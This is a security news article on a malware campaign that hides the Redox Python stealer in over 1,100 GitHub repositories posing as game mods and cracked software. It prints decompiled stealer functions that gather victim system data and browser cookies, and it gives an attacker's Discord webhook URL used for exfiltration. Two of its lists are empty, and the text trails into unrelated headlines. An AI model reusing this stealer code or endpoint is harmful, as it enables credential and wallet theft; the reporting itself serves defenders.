A sophisticated malware campaign leveraging GitHub repositories disguised as game modifications and cracked software has been uncovered, exposing a dangerous convergence of social engineering tactics and automated credential harvesting.
Security researchers identified over 1,100 malicious repositories distributing variants of the Redox stealer, a Python-based malware designed to exfiltrate sensitive data including cryptocurrency wallet keys, browser cookies, and gaming platform credentials.
The malware operates through a multi-stage data harvesting process beginning with system reconnaissance.
Initial execution triggers a globalInfo() function that collects the victim’s IP address, geolocation via the geolocation-db.com API, and Windows username using os.getenv(‘USERNAME’).
This data is formatted into Discord-enabled Markdown for exfiltration:
def globalInfo():
ip = getip() # Custom IP resolver omitted in decompiled code
username = os.getenv('USERNAME')
ipdata = requests.get(f"https://geolocation-db.com/jsonp/{ip}").json()
return f":flag_{ipdata['country_code']}: - `{username.upper()} | {ip} ({ipdata['country_name']})`"
Obfuscation techniques include base64-encoded Discord webhook URLs split across multiple variables (magic, love, god, destiny) to evade static analysis.
When reconstructed, these strings resolve to active webhooks like https://discord.com/api/webhooks/1050437982584324138/VJByvmBKESSUv4fYn0LIjlBR4VzMRTEPOKVJoWFvCeHd7o3LtclQMJDMuiLzT57iqn7B, which serve as centralized logging endpoints for attackers.
Attackers employ algorithmic repository generation strategies outlined in a now-deleted “social engineering” forum guide. Key tactics include:
The Redox payload incorporates SQLite database queries to extract credentials from browsers (Chrome, Edge) and applications like Steam and Discord:
def getCookie(path, arg):
conn = sqlite3.connect(tempfold)
cursor = conn.cursor()
cursor.execute('SELECT host_key, name, encrypted_value FROM cookies')
data = cursor.fetchall() # Decryption via DPAPI omitted
return base64.b64encode(pickle.dumps(data))
Files matching keywords (metamask, exodus, riotgames) are zipped and uploaded to Anonfiles using multithreaded workers.
The Kiwi() module recursively scans directories for documents containing phrases like “password” or “bank,” prioritizing Desktop, Downloads, and Documents folders.
A custom Python crawler identified 1,115 suspicious repositories, 351 of which matched the “README + archive” structure indicative of malware.
Despite 10% of repos having user-reported issues, only 3% (11 repos) were flagged as malicious—a 97% success rate in evading detection.
Despite GitHub’s malware detection systems, repositories remain active due to:
The researcher’s spreadsheet of confirmed malicious repos has not yet triggered bulk takedowns, highlighting gaps in proactive monitoring.
As one forum user lamented, “Script kiddies flooded GitHub with fake cracks—now even real ones get flagged”, underscoring the collateral damage of these campaigns. GitHub has yet to comment on planned detection improvements.
This campaign illuminates the evolving misuse of open-source platforms for large-scale social engineering.
With Redox’s codebase requiring only 1,000 lines of Python to automate credential harvesting, developers must remain vigilant against too-good-to-be-true repositories—even on trusted platforms like GitHub.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free
Multi-factor authentication (MFA), long considered a cornerstone of cybersecurity defense, is facing a formidable new…
A sophisticated cyberespionage campaign linked to Chinese state-sponsored actors has exploited a previously patched Check…
A critical security flaw (CVE-2025-20059) has been identified in supported versions of Ping Identity’s PingAM…
Netskope Threat Labs uncovered a sprawling phishing operation involving 260 domains hosting approximately 5,000 malicious…
A new wave of cyberattacks leveraging the Winos4.0 malware framework has targeted organizations in Taiwan…
A sweeping analysis of the Common Crawl dataset—a cornerstone of training data for large language…